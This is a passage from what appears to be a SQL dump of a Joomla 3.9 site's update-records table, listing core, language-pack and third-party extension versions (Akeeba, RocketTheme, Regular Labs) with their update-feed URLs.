https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9281,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9282,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9283,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9284,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9285,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9286,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9287,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9288,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9289,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9290,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9291,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9292,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9293,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9294,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9295,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9296,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9297,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9298,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9299,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9300,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9301,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9302,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9303,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9304,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9305,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9306,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9307,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9308,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9309,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9310,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9311,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9312,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9313,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9314,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9315,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9316,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9317,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9318,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9319,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9320,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9321,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9322,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9323,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9324,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9325,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9326,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9327,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9328,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9329,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9330,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9331,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(9332,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(9333,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(9334,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(9335,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(9336,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(9337,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(9338,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9339,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9340,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9341,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9342,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9343,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9344,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9345,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9346,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9347,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9348,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9349,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9350,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9351,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9352,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9353,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9354,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9355,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9356,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9357,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9358,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9359,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9360,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9361,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9362,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9363,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9364,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9365,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9366,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9367,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9368,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9369,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9370,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9371,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9372,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9373,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9374,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9375,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9376,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9377,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9378,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9379,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9380,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9381,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9382,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9383,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9384,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9385,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9386,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(9387,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(9388,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(9390,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9391,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9392,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9393,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9394,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9395,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9396,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9397,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9398,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9399,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9400,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9401,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9402,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9403,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9404,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9405,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9406,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9407,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9408,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9409,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9410,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9411,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9412,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9413,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9414,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9415,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9416,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9417,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9418,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9419,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9420,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9421,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9422,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9423,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9424,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9425,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9426,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9427,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9428,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9429,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9430,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9431,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9432,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9433,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9434,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9435,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9436,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9437,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9438,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9439,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9440,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9441,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9442,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(9443,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(9444,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(9445,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(9446,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(9447,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(9448,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(9449,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9450,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9451,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9452,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9453,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9454,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9455,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9456,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9457,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9458,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9459,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9460,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9461,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9462,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9463,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9464,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9465,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9466,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9467,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9468,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9469,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9470,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9471,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9472,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9473,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9474,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9475,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9476,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9477,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9478,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9479,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9480,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9481,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9482,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9483,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9484,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9485,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9486,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9487,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9488,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9489,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9490,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9491,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9492,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9493,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9494,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9495,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9496,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		